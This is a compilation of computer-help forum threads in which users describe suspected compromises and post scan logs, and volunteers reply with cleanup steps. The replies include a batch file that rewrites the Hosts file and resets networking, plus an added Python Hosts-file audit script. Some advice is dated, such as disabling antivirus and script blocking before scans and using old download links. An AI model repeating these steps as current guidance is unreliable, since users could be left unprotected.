I have Win7 pre-release running on my lounge room PC, as well as the old faithful XP on dual boot (second HDD).
After the October 22nd release, Win7 would not run, and has also shut down access to XP as well!!

I was told that it would shut down every 2 hours until I paid money, but was not expecting my whole machine to be sabotaged?

Also read that I would get $100 off retail from using the pre-release Win7?

Anyone else like me - frustrated.

Automatic repair could not do justice to Win7 and it shut down with no warning.

Answer:Computer compromised

I re-started and tried to get XP happening, but the screen disappeared permanently after the intro logo.
Then I re-set and tried Win7 again, and lo and behold, it came up and ran normally??? I have a TV program running on MCE as I type!

Any ideas as to why XP is compromised? I have done chkdsk in the recovery console.

1 more reply

My computer has been acting funny, websites not displaying properly, HTML messed up, hanging all of the time. It should be a high performance machine with Win 64, P6TD deluxe MB, 6GB Corsair Dominator RAM, but it's really sluggish. Here are the DDS log reports. My website was hacked recently, maybe because my PC was compromised. Not sure. Thanks in advance.
Sam

ps. I do have access to Windows Disc.


DDS (Ver_10-12-12.02) - FAT32_AMD64
Run by Monster at 9:38:13.24 on Mon 01/10/2011
Internet Explorer: 8.0.7600.16385 BrowserJavaVersion: 1.6.0_22
Microsoft Windows 7 Ultimate 6.1.7600.0.1252.1.1033.18.6135.3268 [GMT 9:00]

AV: Trend Micro Titanium *Disabled/Updated* {68F968AC-2AA0-091D-848C-803E83E35902}
SP: Trend Micro Titanium *Disabled/Updated* {D3988948-0C9A-0693-BE3C-BB4CF86413BF}
SP: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

============== Running Processes ===============

C:\Windows\system32\wininit.exe
C:\Windows\system32\lsm.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\svchost.exe -k RPCSS
C:\Windows\system32\atiesrxx.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe -k netsvcs
C:\Windows\system32\svchost.exe -k LocalService
C:\Windows\system32\svchost.exe -k NetworkService
C:\Windows\system32\atieclxx.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\system32\s... Read more

Answer:Computer Compromised

Anyone? Does this look clean? Is that why nobody got back to me? I am having problems with websites like ESPN, which is telling me that the server's certificate does not match the host's name.

static.ak.fbcdn.net

I am getting weird HTML across the page instead of a clean website. Pages are loading slowly.

1 more reply

Hi,

My computer (husband's actually) has problems again. I did all the steps from the Read This First post and am attaching the logs it requests. Note, I couldn't perform any "fix" with HitmanPro as I was told that my trial license had expired; it did find issues, however. Also, Malwarebytes did not find anything at all.

Please let me know how to proceed.

Thanks.
 

Answer:Computer compromised (again)

You still need to attach the Hitman log. Also the log from running MBAM.

And please tell me what issues you are having.
 

12 more replies

Hello. Yesterday when I returned from lunch, my computer was logged out. I thought maybe I had a power outage, but the other computer on the network (server) was still logged in. So, I just logged back in and went back to work. This morning, when I came into work, again I was logged out. And again I just logged back in. While I was working today, I looked up and saw that I was logged out. When I went to log back on, now there was my icon, but also another one with a karate icon, and it said "administrator"...and that "person" was logged on. I was very concerned and tried to log back in, but it wouldn't let me. I shut off my computer and then turned it back on. Now, the only user I saw was mine. Some background....I have Windows XP, McAfee Security with a Firewall. I do use logmein.com, but it's password protected. Just to be safe, I turned that off. I looked around my files and found that someone named "administrator" was in my computer yesterday when I was out to lunch. Also it showed that my fax file was used around the same time. I found a new document in "recent documents" called "desktop" and when I clicked on that file, this is what came up:

[LocalizedFileNames]
Mail [email protected],-4
Desktop (create shortcut).[email protected],-21
Compressed (zipped) [email protected],-10148
I am very concerned that someone took some private information from me. Is there a way to find out what this was? An... Read more

Answer:Has my computer been compromised?

16 more replies

Hello there, I wonder if someone can help me out. I think someone has hacked my computer; what is the process for checking, please?

Answer:I think my computer has been compromised

What are the symptoms making you believe your computer has been compromised?

Download Security Check from here or here and save it to your Desktop.
Double-click SecurityCheck.exe
Follow the onscreen instructions inside of the black box.
A Notepad document should open automatically called checkup.txt; please post the contents of that document.
NOTE 1. If one of your security applications (e.g., third-party firewall) requests permission to allow DIG.EXE access to the Internet, allow it to do so.
NOTE 2. SecurityCheck may produce some false warning(s), so leave the results reading to me.
NOTE 3. If you receive the UNSUPPORTED OPERATING SYSTEM! ABORTED! message, restart the computer and Security Check should run.

Please download Farbar Service Scanner (FSS) and run it on the computer with the issue.
Make sure the following options are checked:
Internet Services
Windows Firewall
System Restore
Security Center/Action Center
Windows Update
Windows Defender
Other Services
Press "Scan".
It will create a log (FSS.txt) in the same directory the tool is run.
Please copy and paste the log to your reply.

Please download MiniToolBox and run it.
Checkmark the following boxes:
Report IE Proxy Settings
Report FF Proxy Settings
List content of Hosts
List IP configuration
List Winsock Entries
List last 10 Event Viewer log
List Installed Programs
List Devices (do NOT change any settings here)
List Users, Partitions and Memory size
List Restore Points
Click Go and post the result.

Please download Malwarebytes Anti-Malware (MBAM) to ... Read more

1 more reply

Strange one, this. My desktop, which is wired to my router, appears to have a problem. 2 of my bank accounts and eBay have both requested my security details when I try and log on; the sites' URLs seem genuine. Why I am suspicious is that my laptop, which is wireless, can still access these sites using my normal security details. When I try and log on to eBay it says my account has been compromised and I need to go through its security again. Is it my PC that's at fault or something more sinister?

More replies

Hello all,

I had an issue with my email, did a search on Google and found a support website. I called them, they asked for card details and a screenshare.

They then took over my system and I think installed some things, as they showed me my passwords in a text file; also they sent an email from my account to themselves stating I authorize payment... I tried to stop it, they kept writing, and after I switched the computer off just to get away, I feel I have been compromised. My bank said the same thing and a friend said the best place to get help was here.

Please do help me clean my system from these leechers.

I run Windows.

Thank you

Answer:computer compromised seriously

I would suggest you replace the credit card and of course dispute any charges.
 
There are sites that, when you do a search for help, represent themselves falsely as Microsoft, popular security programs and many other popular programs.
They are simply thieves.
 
It is likely that no malware was installed, but the program used to remotely connect may still be on the computer, along with a crappy scan program or two.
 
Use all of the programs below to find and remove both malware and adware.
 
Use CCleaner to remove Temporary files, program caches, cookies, logs, etc. Use the Default settings. No need to use the Registry Cleaning Tool...risky. Pay close attention while installing and UNcheck offers of toolbars....especially Google.
After install, open CCleaner and run by clicking on the Run Cleaner button in the bottom right corner.
CCleaner - PC Optimization and Cleaning - Free Download
 
Download Malwarebytes' Anti-Malware from Here
Double-click mbam-setup-2.X.X.XXXX.exe to install the application (X's are the current version number).
Make sure a checkmark is placed next to Launch Malwarebytes' Anti-Malware, then click Finish.
Once MBAM opens, when it says Your databases are out of date, click the Fix Now button.
Click the Settings tab at the top, and then in the left column, select Detections and Protections, and if not already checked place a checkmark in the selection box for Scan for rootkits.
Click the Scan tab at the top of the program window, select Threat S... Read more

2 more replies

I downloaded a few songs from LimeWire last night. Two of them did not play music and I was suspicious of them, so I deleted them. Then I ran Stinger and it isolated one of the files as being a UA trojan downloader and it said it deleted it. I searched the computer for the other file name and it did not come up. Ok, now today, I opened a My Docs folder and I noticed every folder in there is "Date Accessed" on 3/1/2009 at 8:58 pm. Also a bunch of files are listed as date accessed this morning and afternoon. Some info in those files is sensitive. Is my computer security compromised?
 

Answer:Is my computer compromised?

16 more replies

Using Ad-Aware I found a file in the Windows system folder that did not look familiar: yrbxysxr.exe
I decided to run HijackThis and post the log to see if anyone could help. Thanks

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 8:29:07 PM, on 10/12/2007
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Common Files\Symantec Shared\ccSvcHst.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\Common Files\Symantec Shared\AppCore\AppSvc32.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Java\jre1.6.0_02\bin\jusched.exe
C:\Program Files\Common Files\Symantec Shared\ccApp.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Program Files\Symantec\LiveUpdate\ALUSchedulerSvc.exe
C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE
C:\PROGRA~1\NORTON~2\NORTON~1\NPROTECT.EXE
C:\PROGRA~1\NORTON~2\NORTON~1\SPEEDD~1\NOPDB.EXE
C:\... Read more

Answer:S.o.s. Compromised Computer

Hello and welcome to BC.

Sorry for the late response. If you haven't received help elsewhere yet and still need help, please post a fresh HijackThis log and I'll be happy to help you.

20 more replies

I've got a computer at work that seems to be fairly compromised. I've followed all of the steps listed in the 'read this topic' message and am at the point where I get to post a HijackThis log (joy!). Basically this system has popups that show up constantly and the typical cleaning programs/methods have not gotten the popups to go away. Virtumonde has been detected on the system but I haven't been able to get it cleaned up yet. Basically each time I run a scan (with whatever program) it finds new things that weren't there on the previous scan. I just need to figure out the root cause of these popups and get rid of it. The date on the comp was set wrong at the time of the scan. I took this scan 20 minutes ago.

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 1:45:33 PM, on 7/21/2003
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.16473)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\Program Files\Windows Defender\MsMpEng.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Common Files\Logitech\Bluetooth\LBTSERV.EXE
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Lavasoft\Ad-Aware 2007\aawservice.exe
C:\Program Files\WIDCOMM... Read more

Answer:Compromised Computer

Welcome to the BleepingComputer HijackThis Logs and Analysis forum ensoll. My name is Richie and I'll be helping you to fix your problems.

It appears you've no virus protection installed. Download/install one of the following freeware options from the choice below. Once installed, update its definitions and then run a full system virus scan.
AVG7 Free Edition Antivirus: http://free.grisoft.com/softw/70free/setup...ree_446a965.exe
Avast! 4 Home Edition: http://files.avast.com/iavs4pro/setupeng.exe
Avira AntiVir Personal Edition Classic: http://www.free-av.com/
------------------------------
Please download VundoFix.exe to your desktop.
Double-click VundoFix.exe to run it.
When VundoFix re-opens, click the "Scan for Vundo" button.
Once it's done scanning, click the "Remove Vundo" button.
You will receive a prompt asking if you want to remove the files, click "YES".
Once you click yes, your desktop will go blank as it starts removing Vundo.
When completed, it will prompt that it will reboot your computer, click "OK".
Post the contents of C:\vundofix.txt into your next reply.
Note: It is possible that VundoFix encountered a file it could not remove. In this case, VundoFix will run on reboot; simply follow the above instructions starting from "Click the Scan for Vundo button." when VundoFix appears at reboot.
------------------------------
Please download Combofix and save to your desktop:
Note: It is important that it is saved directly to your d... Read more

1 more reply

Hi there,

I'm trying to help my mum out with her computer. After a visit to her local bank they informed her that someone had got her bank details online and has been ordering video games for themselves with them. I need to ensure that her PC is like Fort Knox, as I'm meant to be good with computers but need help this time. Here's what I've tried so far:

Ran MSE anti-virus, updated and full scan: nothing found.
Ran Malwarebytes anti malware: updated and full scan: nothing found

IE is the latest version but it seems to have adverts all over the place. I've disabled all add-ons but to no avail. Is the best thing to do next to uninstall and reinstall IE?

Thanks for any advice given to me.

Answer:Computer compromised

The first thing you need to do is change all passwords, using a "known clean" computer. Do not use the infected one!

Next, flush the bad DNS cache and restore MS's Hosts file:
Copy and paste these lines in Notepad.

@Echo on
rem Rebuild the Hosts file with only the default loopback entry.
rem The hidden/system/read-only attributes are cleared first so the file can be overwritten.
pushd %SystemRoot%\system32\drivers\etc
attrib -h -s -r hosts
echo 127.0.0.1 localhost>hosts
attrib +r +h +s hosts
popd
rem Drop and renew the DHCP lease, then clear the DNS resolver cache
ipconfig /release
ipconfig /renew
ipconfig /flushdns
rem Reset the Winsock catalog and the TCP/IP stack; both need an elevated prompt
netsh winsock reset
netsh int ip reset
rem Reboot after one second, then delete this batch file
shutdown -r -t 1
del %0

Save as flush.bat to your desktop.
Double click on the flush.bat file to run it. Vista and Windows 7... right click the .bat file and choose to run as Administrator. Your computer will reboot itself.

Now, download DDS from one of these links:
DDS.com
DDS.pif
Disable any script blocking protection
Double click the dds icon to run the tool.
When done, DDS will open two (2) logs: DDS.txt
Attach.txt <--- will be minimized in the task tray

Save both reports to your desktop.

Include the contents of both logs in your next post.
The scan will instruct you to post Attach.txt as an attachment.

4 more replies
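The reply above overwrites the Hosts file outright, and an earlier reply has MiniToolBox "List content of Hosts" for the same reason: a tampered Hosts file is how a bank or eBay login can behave differently on one machine in the house while the other is fine. Before wiping it, it is worth keeping the evidence of what was redirected where. The following is an added example in Python, not code from the thread, CCleaner or MiniToolBox. It parses a Hosts file and classifies each mapping: a real name sent to a routable address (the login-page redirect), a real name sent to loopback or 0.0.0.0 (antivirus update and security-site blackholing), localhost itself pointed elsewhere, and malformed lines. The domain names and addresses in the sample are constructed (reserved .example names, TEST-NET-3 addresses); pass your own bank's domain as a watched suffix to have those hits flagged.

```python
"""Audit a Windows Hosts file for redirections and sinkholes before it is overwritten (added example)."""
import ipaddress
import sys

# Names that legitimately map to a loopback address
LOCAL_NAMES = {"localhost", "localhost.localdomain", "broadcasthost",
               "ip6-localhost", "ip6-loopback", "ip6-localnet",
               "ip6-mcastprefix", "ip6-allnodes", "ip6-allrouters"}

# Constructed sample: reserved .example names, addresses from TEST-NET-3 (203.0.113.0/24)
SAMPLE_HOSTS = """\
# Copyright (c) 1993-2009 Microsoft Corp.
# localhost name resolution is handled within DNS itself.
#    127.0.0.1       localhost
127.0.0.1       localhost
::1             localhost
203.0.113.45    online.examplebank.example www.examplebank.example
203.0.113.45    signin.auction.example     # bank and auction logins sent elsewhere
127.0.0.1       update.av-vendor.example   # antivirus updates blackholed
0.0.0.0         www.security-forum.example
not-an-ip       whatever
"""


def parse_hosts(text: str) -> list:
    """Return one record per (address, name) pair; comments and blank lines are skipped."""
    records = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        try:
            addr = ipaddress.ip_address(fields[0])
        except ValueError:
            records.append({"line": lineno, "addr": None, "name": fields[0]})
            continue
        for name in fields[1:]:
            records.append({"line": lineno, "addr": addr, "name": name.lower()})
    return records


def audit_hosts(text: str, watch_suffixes=()) -> list:
    """Classify every mapping:
    redirect           - a real name sent to a routable address (login page served by the attacker)
    sinkhole           - a real name sent to loopback or 0.0.0.0 (updates / security sites blocked)
    localhost_redirect - localhost itself pointed somewhere else
    malformed          - first field is not an IP address
    'watched' marks names under the suffixes the caller cares about, e.g. their bank."""
    findings = []
    for rec in parse_hosts(text):
        addr, name = rec["addr"], rec["name"]
        if addr is None:
            findings.append({"line": rec["line"], "kind": "malformed", "name": name,
                             "addr": None, "watched": False})
            continue
        local_addr = addr.is_loopback or addr.is_unspecified
        watched = any(name == s or name.endswith("." + s) for s in watch_suffixes)
        if name in LOCAL_NAMES:
            if not local_addr:
                findings.append({"line": rec["line"], "kind": "localhost_redirect", "name": name,
                                 "addr": str(addr), "watched": watched})
            continue
        kind = "sinkhole" if local_addr else "redirect"
        findings.append({"line": rec["line"], "kind": kind, "name": name,
                         "addr": str(addr), "watched": watched})
    return findings


def summarize(findings: list) -> dict:
    """Count findings per kind, plus how many hit a watched domain."""
    counts = {}
    for f in findings:
        counts[f["kind"]] = counts.get(f["kind"], 0) + 1
    counts["watched"] = sum(1 for f in findings if f["watched"])
    return counts


if __name__ == "__main__":
    # usage: hostsaudit.py [path-to-hosts] [watched.domain ...]; no arguments runs the constructed sample
    if len(sys.argv) > 1:
        with open(sys.argv[1], encoding="utf-8", errors="replace") as fh:
            text = fh.read()
        watch = tuple(sys.argv[2:])
    else:
        text, watch = SAMPLE_HOSTS, ("examplebank.example",)
    results = audit_hosts(text, watch)
    for f in results:
        flag = " [WATCHED]" if f["watched"] else ""
        print(f"line {f['line']:>3}: {f['kind']:<18} {f['name']} -> {f['addr']}{flag}")
    print(summarize(results))
```

On Windows the file is %SystemRoot%\system32\drivers\etc\hosts; copy it to a USB stick from a clean boot and run the audit there, since the redirect addresses are what the bank's fraud team will want when you report the compromise.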

Good morning,
I need help!
Yesterday, I found out that one of my online bank accounts (Bank A) has been compromised. I do most of my banking online, so I link my other banks (Bank B and Bank C) into this bank.

On July 10, Bank A instructed ACH transfers from Bank B ($2000) and Bank C ($2500) into Bank A. I don't know if I should say I am lucky because I don't have much money, but because I don't have much money those ACH transfers were denied (non-sufficient funds).

So, yesterday, I went online into Bank A, and I did find 2 instructions. So, my 1st impression was that maybe the banks screwed up the transactions (should be other people's account). Then, later when I looked at the bank setup, I found a new bank that was waiting to be verified for linking with Bank A. Then, I knew I had a problem. So, I called the bank and reported this.

I googled, and found this site. I saw a posting about Keylogger and many replies of help. So, I am hoping I can get your help as well.

For the past 2 months, I have had several things happen differently.
1. I started to play World of Warcraft battlenet again...
2. I received a new computer from work
3. My wife started to use the computer at home more often, but mostly to go to friendster.com (I think)

I uninstalled my ZoneAlarm because I have been having problems restarting.
But prior to this, I had ZoneAlarm, spydoctor, AVG antivirus installed. Right now, I have HijackThis, Panda (didn't catch anything), trojanhunters (found 2 trojans, but t... Read more

More replies

edit: sorry for not posting the malware name in the title, it's JPGIFRAMER

I feel that some kind of malware has recently compromised my computer. Symptoms:
random internet drops
slow computer
McAfee randomly repairing jpg files from the virus JPGiframer
been a long time since I got a windows update

Here's an HJT log. Help me!!!

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 8:36:23 PM, on 5/6/2009
Platform: Windows XP SP3 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP3 (6.00.2900.5512)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Creative\Shared Files\CTAudSvc.exe
C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\PROGRA~1\McAfee\MSC\mcmscsvc.exe
c:\PROGRA~1\COMMON~1\mcafee\mna\mcnasvc.exe
c:\PROGRA~1\COMMON~1\mcafee\mcproxy\mcproxy.exe
C:\PROGRA~1\McAfee\VIRUSS~1\mcshield.exe
C:\Program Files\McAfee\MPF\MPFSrv.exe
C:\WINDOWS\system32\nvsvc32.exe
C:\PROGRA~1\McAfee\VIRUSS~1... Read more

Answer:Compromised computer

Hello and welcome to Bleeping Computer

We apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here.

If you have since resolved the original problem you were having, we would appreciate you letting us know. If not, please perform the following steps below so we can have a look at the current condition of your machine. If you have not done so, include a clear description of the problems you're having, along with any steps you may have performed so far.

Upon completing the steps below another staff member will review and take the steps necessary with you to get your machine back in working order, clean and free of malware.

If you have already posted a DDS log, please do so again, as your situation may have changed. Use the 'Add Reply' and add the new log to this thread.

Thanks and again sorry for the delay.

We need to see some information about what is happening in your machine. Please perform the following scan:
Download DDS by sUBs from one of the following links. Save it to your desktop.
DDS.com
DDS.scr
DDS.pif
Double click on the DDS icon, allow it to run.
A small box will open, with an explanation about the tool. No input is needed, the scan is running.
Notepad will open with the resul... Read more

2 more replies

Been fighting this for a week and I can't find anything actually wrong, but I know something has to be there. My Warcraft account was recently hacked and based on some of the actions of the hacker I have to assume that they have gained access to my computer. Not only have they gotten my login information every time I change it, but they have gotten some files submitted to Blizzard. Despite running multiple virus and malware scans nothing has ever come up. I am reluctant to simply reformat because I would like to at least try to understand how this has occurred, but you can't fix what you can't find.
 
 
DDS (Ver_2012-11-20.01) - NTFS_AMD64
Internet Explorer: 10.0.9200.16750  BrowserJavaVersion: 10.45.2
Run by troy at 1:30:21 on 2014-01-14
Microsoft Windows 7 Professional   6.1.7601.1.1252.1.1033.18.4094.1950 [GMT -6:00]
.
AV: AVG AntiVirus Free Edition 2014 *Enabled/Updated* {0E9420C4-06B3-7FA0-3AB1-6E49CB52ECD9}
AV: Emsisoft Anti-Malware *Disabled/Updated* {8504DEEF-CC04-1F76-2137-F1A5F4A659DA}
SP: Windows Defender *Disabled/Outdated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
SP: Emsisoft Anti-Malware *Disabled/Updated* {3E653F0B-EA3E-10F8-1B87-CAD78F211367}
SP: AVG AntiVirus Free Edition 2014 *Enabled/Updated* {B5F5C120-2089-702E-0001-553BB0D5A664}
.
============== Running Processes ===============
.
C:\Windows\system32\lsm.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Program Files (x86)\Emsisoft Anti-Malware\a2service.exe
C:\Windows\system32\svc... Read more

Answer:Computer Compromised

Hello and welcome to Bleeping Computer! I am HelpBot: an automated program designed to help the Bleeping Computer Staff better assist you! This message contains very important information, so please read through all of it before doing anything.
We apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here.
To help Bleeping Computer better assist you please perform the following steps:
*************************************************** In order to continue receiving help at BleepingComputer.com, YOU MUST tell me if you still need help or if your issue has already been resolved on your own or through another resource! To tell me this, please click on the following link and follow the instructions there.CLICK THIS LINK >>> http://www.bleepingcomputer.com/logreply/520819 <<< CLICK THIS LINK
If you no longer need help, then all you needed to do was the previous instructions of telling me so. You can skip the rest of this post. If you do need help please continue with Step 2 below.
***************************************************If you still need help, I would like you to post a Reply to this topic (click the "Add Reply" button in the lower right hand of t... Read more

17 more replies

Completed the Read & Run Me First procedures. Attached the following reports: CounterSpy, Bitdefender, Panda ActiveScan, Runkeys, Newfiles and HJT log.

PROBLEMS:

(1) Downloaded Easyjob Resume V2.7995 demo. Tried to install crack EasyJob.Resume.Builder.v2.790_CRKEXE-FFF.zip. Program showed to be activated and registered but was not working properly. Could not print nor save files. Over the course of the day the program began crashing. Program crashing is getting worse.

(2) When using IE browser will be directed to various types of advertisements.


(3) Not sure when or how...possibly while using Easyjob Pro had AVG active protection running. Alerts came up several, many times about possible intrusion. Got frustrated and zoned out one too many times -- may have deleted file(s) I shouldn't have. or
during scanning and removal of spyware/malware I removed this file(s). In any event unable to utilize Control Panel's Add and Remove Program feature. A message box appears. Windows cannot find 'C:\WINDOWS\system32\rundll32.exe'. Make sure you typed name correctly....


Beginning to read the Official HijackThis Tutorial to get up to speed on deciphering this myself... I'm in a time crunch and need your assistance to resolve these issues because I must get my resume out by Friday for a prospective employer.
 

Answer:Computer compromised 1 of 2

Computer compromised 2 of 2

13 more replies

Hi! I posted a log a while back for a different computer and ended up replacing that one, but now I'm afraid my laptop may be infected. Can someone please take a look at my logs & let me know if I have anything remaining? I ran Malwarebytes Anti-malware and it removed a few items, but my computer is still acting strangely. Thank you in advance!

Logfile of Trend Micro HijackThis v2.0.4
Scan saved at 1:14:41 PM, on 10/13/2010
Platform: Windows XP SP3 (WinNT 5.01.2600)
MSIE: Internet Explorer v8.00 (8.00.6001.18702)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\System32\WLTRYSVC.EXE
C:\WINDOWS\System32\bcmwltry.exe
C:\WINDOWS\system32\spoolsv.exe
c:\drivers\audio\r211990\stacsv.exe
C:\Program Files\Cisco Systems\VPN Client\cvpnd.exe
C:\PROGRA~1\SYMANT~1\SYMANT~1\DefWatch.exe
C:\Program Files\Java\jre6\bin\jqs.exe
C:\PROGRA~1\SYMANT~1\SYMANT~1\Rtvscan.exe
C:\WINDOWS\system32\DRIVERS\o2flash.exe
C:\Program Files\Microsoft\Search Enhancement Pack\SeaPort\SeaPort.exe
C:\Program Files\Dell Support Center\bi... Read more

Answer:Computer may be compromised

Hello and welcome to Bleeping Computer

We apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here.

If you have since resolved the original problem you were having, we would appreciate you letting us know. If not, please perform the following steps below so we can have a look at the current condition of your machine. If you have not done so, include a clear description of the problems you're having, along with any steps you may have performed so far.

Upon completing the steps below I will review and take the steps necessary with you to get your machine back in working order, clean and free of malware.

If you have already posted a DDS log, please do so again, as your situation may have changed. Use the 'Add Reply' and add the new log to this thread.

Thanks and again sorry for the delay.

We need to see some information about what is happening in your machine. Please perform the following scan:
Download DDS by sUBs from one of the following links. Save it to your desktop.
DDS.scr
DDS.pif
Double click on the DDS icon, allow it to run.
A small box will open, with an explanation about the tool. No input is needed, the scan is running.
Notepad will open with the results.
Follow the ... Read more


So my dad tells me that his desktop computer is acting all weird, and I have a feeling something may be infected. Internet Explorer.exe cannot be found, I think it was deleted or renamed, which raises a lot of questions as to how that happened. Here is my HijackThis log file... Thank you!
Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 8:29:49 PM, on 2/14/2010
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Unable to get Internet Explorer version!
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Common Files\Symantec Shared\ccSetMgr.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\Common Files\Symantec Shared\ccEvtMgr.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\Program Files\Symantec AntiVirus\DefWatch.exe
C:\Program Files\Dell Network Assistant\hnm_svc.exe
C:\WINDOWS\system32\svchost.exe
C:\Program Files\Symantec AntiVirus\Rtvscan.exe
C:\Program Files\Webroot\Spy Sweeper\SpySweeper.exe
C:\WINDOWS\system32\igfxtray.exe
C:\WINDOWS\system32\hkcmd.exe
C:\WINDOWS\system32\igfxpers.exe
C:\Program Files\Java\jre1.5.0_06\bin\jusched.exe
C:\WINDOWS\RTHDCPL.EXE
C:\Program Files\CyberLink\PowerDVD DX\PDVDDXSrv.exe
C:\Program Files\Google\Google Desktop Search\Goo... Read more

Answer: Computer compromised


Hello,

I'm hoping I can get a second opinion on a question I posed on the MS Win7 Forum. The answer seemed to go against what I've read on numerous computer security sites regarding different software to have. Also mentioned was "first I would dump anything Norton"; many sites gave it extremely high marks, but anyway. It seemed the reply was all negative without answering the question. Here is what I posted, and his answer. Hope this is okay.

One thing I didn't think to add to the original question was that I'm using Norton Safe Search in the toolbar, if that matters.

________________________________________________
Is my computer compromised?

Win7, IE9, Norton Internet Security 2011 (Malwarebytes, SuperAntispyware, and Ad-Aware); I only use the ones in brackets as secondary scans and not actively running.

I notice sometimes at many different websites my toolbar will what I say is "move down a step" and leave a blank like toolbar (empty of course) above it just below the address bar.

I'm using Norton Internet Security 2011, and have Malwarebytes, SuperAntispyware, and Ad-Aware as just secondary scanners. I keep everything updated at least weekly, though Norton automatically updates on its own the same as Windows. Every time I do scans (weekly) they all come up clean.

With the toolbar moving down leaving an empty space between ... Read more


Hello everybody!

I finally removed Spyware Protect 2009 from my computer with Malwarebytes, and just wanted to know if my personal info (banking records, etc.) can be accessed by others on the web. I don't see any TDSS/backdoor.bot, soo... idk, just want to be sure. Any help is appreciated. Here is my log:
Malwarebytes' Anti-Malware 1.33
Database version: 1733
Windows 5.1.2600 Service Pack 2

2/5/2009 8:31:53 PM
mbam-log-2009-02-05 (20-31-53).txt

Scan type: Quick Scan
Objects scanned: 75586
Time elapsed: 19 minute(s), 59 second(s)

Memory Processes Infected: 1
Memory Modules Infected: 1
Registry Keys Infected: 4
Registry Values Infected: 1
Registry Data Items Infected: 0
Folders Infected: 1
Files Infected: 4

Memory Processes Infected:
C:\WINDOWS\sysguard.exe (Trojan.FakeAlert) -> Unloaded process successfully.

Memory Modules Infected:
C:\WINDOWS\system32\iehelper.dll (Trojan.Vundo.H) -> Delete on reboot.

Registry Keys Infected:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{c9c42510-9b21-41c1-9dcd-8382a2d07c61} (Trojan.Vundo.H) -> Quarantined and deleted successfully.
HKEY_CLASSES_ROOT\CLSID\{c9c42510-9b21-41c1-9dcd-8382a2d07c61} (Trojan.Vundo.H) -> Quarantined and deleted successfully.
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{c9c42510-9b21-41c1-9dcd-8382a2d07c61} (... Read more

Answer: Is my computer compromised?

Hi DAUeleven and welcome to BC.

Please print out and follow these instructions: "How to use SDFix". When using this tool, you must use the Administrator's account or an account with "Administrative rights".

Disconnect from the Internet and temporarily disable your anti-virus, script blocking and any real time protection programs before performing a scan.

When done, the SDFix report log will open in notepad and automatically be saved in the SDFix folder as Report.txt.

If SDFix is unable to run after rebooting from Safe Mode, run SDFix in either Mode, and type F, then press Enter for it to finish the final stage and produce the report.

